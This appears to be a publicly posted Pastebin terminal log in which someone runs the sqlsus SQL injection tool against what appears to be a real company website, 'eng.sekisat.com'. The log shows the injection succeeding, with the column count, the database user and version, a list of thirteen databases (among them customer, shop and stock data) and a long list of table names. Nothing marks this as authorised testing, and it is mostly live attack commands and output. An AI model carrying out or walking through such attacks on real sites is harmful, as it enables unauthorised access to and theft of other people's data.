Guest User

Untitled

a guest
Apr 10th, 2015
203
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.11 KB | None | 0 0
  1. ┌─[root@parrot]─[/home/aj3dx]
  2. └──╼ #sqlsus -g vuln.conf
  3.  
  4. sqlsus version 0.7.2
  5.  
  6. Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
  7.  
  8. vuln.conf already exists, overwrite ? [y|n] ? y
  9. [+] Configuration successfully saved to vuln.conf
  10. ┌─[root@parrot]─[/home/aj3dx]
  11. └──╼ #nano vuln.conf
  12. ┌─[root@parrot]─[/home/aj3dx]
  13. └──╼ #sqlsus vuln.conf
  14.  
  15. sqlsus version 0.7.2
  16.  
  17. Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
  18.  
  19. [+] Session "eng.sekisat.com" created
  20. sqlsus> start
  21. [+] Correct number of columns for UNION : 9 (1,1,1,1,1,1,1,0,0)
  22. [+] Length restriction on URL : 8199 bytes
  23. [+] Filling %target...
  24. +----------+-----------------------------+
  25. | Variable | Value |
  26. +----------+-----------------------------+
  27. | database | SEKIsekisat |
  28. | user | 'sekisat'@'localhost' |
  29. | version | 5.5.31-0ubuntu0.12.04.1-log |
  30. +----------+-----------------------------+
  31. 3 rows in set
  32.  
  33. sqlsus> get database
  34.  
  35. Usage : get <item>
  36.  
  37. This command retrieves information from MySQL system tables (information_schema.*).
  38. Note that it will only work on MySQL >= 5. Otherwise, see "brute".
  39.  
  40. Possible items :
  41. tables : get the names of the tables of the current database (as per "set")
  42. columns [table_name] : get the names of the columns [for the given table]
  43. count [table_name] : get the count(*) for each table [or the given table]
  44. db : same as get tables + columns + count
  45. privs : get the privileges for the user
  46. databases : get the names of all the databases
  47.  
  48. sqlsus> get databases
  49. [+] Getting databases names
  50. +---------------+
  51. | Databases |
  52. +---------------+
  53. | SEKIsekisat |
  54. | SEKIBBS |
  55. | SEKIWooJin |
  56. | SEKIcounter |
  57. | SEKIcustomer |
  58. | SEKIgnu4 |
  59. | SEKIip_class |
  60. | SEKIiskylife |
  61. | SEKIproduct |
  62. | SEKIsatellite |
  63. | SEKIshop |
  64. | SEKIstock |
  65. | SEKIzipcode |
  66. +---------------+
  67. 13 rows in set
  68.  
  69. sqlsus> get tables
  70. [+] Getting tables names
  71.  
  72. <( SEKIsekisat )>
  73.  
  74. [basket]
  75.  
  76.  
  77. [board_benchmark]
  78.  
  79.  
  80. [board_category]
  81.  
  82.  
  83. [board_comment]
  84.  
  85.  
  86. [board_digital]
  87.  
  88.  
  89. [board_forum_eng]
  90.  
  91.  
  92. [board_free_broadcasting]
  93.  
  94.  
  95. [board_group]
  96.  
  97.  
  98. [board_pds]
  99.  
  100.  
  101. [board_pds_eng]
  102.  
  103.  
  104. [board_satellite_index]
  105.  
  106.  
  107. [board_satellite_pds]
  108.  
  109.  
  110. [board_service]
  111.  
  112.  
  113. [board_service_eng]
  114.  
  115.  
  116. [board_service_secret]
  117.  
  118.  
  119. [board_setup]
  120.  
  121.  
  122. [company]
  123.  
  124.  
  125. [company22]
  126.  
  127.  
  128. [company_category]
  129.  
  130.  
  131. [company_category22]
  132.  
  133.  
  134. [construction_history]
  135.  
  136.  
  137. [counter_200705]
  138.  
  139.  
  140. [counter_200708]
  141.  
  142.  
  143. [counter_200710]
  144.  
  145.  
  146. [counter_200711]
  147.  
  148.  
  149. [counter_200901]
  150.  
  151.  
  152. [counter_pageview_200704]
  153.  
  154.  
  155. [counter_pageview_200705]
  156.  
  157.  
  158. [counter_pageview_200707]
  159.  
  160.  
  161. [counter_pageview_200708]
  162.  
  163.  
  164. [counter_pageview_200710]
  165.  
  166.  
  167. [counter_pageview_200711]
  168.  
  169.  
  170. [counter_pageview_200712]
  171.  
  172.  
  173. [counter_pageview_200802]
  174.  
  175.  
  176. [counter_pageview_200804]
  177.  
  178.  
  179. [counter_pageview_200805]
  180.  
  181.  
  182. [counter_pageview_200806]
  183.  
  184.  
  185. [counter_pageview_200809]
  186.  
  187.  
  188. [counter_pageview_200901]
  189.  
  190.  
  191. [counter_pageview_200908]
  192.  
  193.  
  194. [employ_applicant]
  195.  
  196.  
  197. [employ_notice]
  198.  
  199.  
  200. [fieldselectdefine]
  201.  
  202.  
  203. [focus]
  204.  
  205.  
  206. [gallery_installation_photo_eng]
  207.  
  208.  
  209. [gallery_satellite]
  210.  
  211.  
  212. [gallery_satellite_photo_eng]
  213.  
  214.  
  215. [gallery_sky_satellite]
  216.  
  217.  
  218. [gallery_user_photo_eng]
  219.  
  220.  
  221. [gallery_user_satellite]
  222.  
  223.  
  224. [package]
  225.  
  226.  
  227. [sat_channel]
  228.  
  229.  
  230. [sat_channel_category]
  231.  
  232.  
  233. [sat_channel_set]
  234.  
  235.  
  236. [sat_channel_set_change]
  237.  
  238.  
  239. [sat_language_category]
  240.  
  241.  
  242. [sat_products]
  243.  
  244.  
  245. [sat_relay]
  246.  
  247.  
  248. [sat_relay_change]
  249.  
  250.  
  251. [sat_satellite]
  252.  
  253.  
  254. [sat_state_category]
  255.  
  256.  
  257. [satellite_photo]
  258.  
  259.  
  260. [service_news]
  261.  
  262.  
  263. [service_news_eng]
  264.  
  265.  
  266. [service_notice]
  267.  
  268.  
  269. [service_notice_eng]
  270.  
  271.  
  272. [service_user_market]
  273.  
  274.  
  275. [service_user_market_comment]
  276.  
  277.  
  278. [sky_satellite_photo]
Advertisement
Add Comment
Please, Sign In to add comment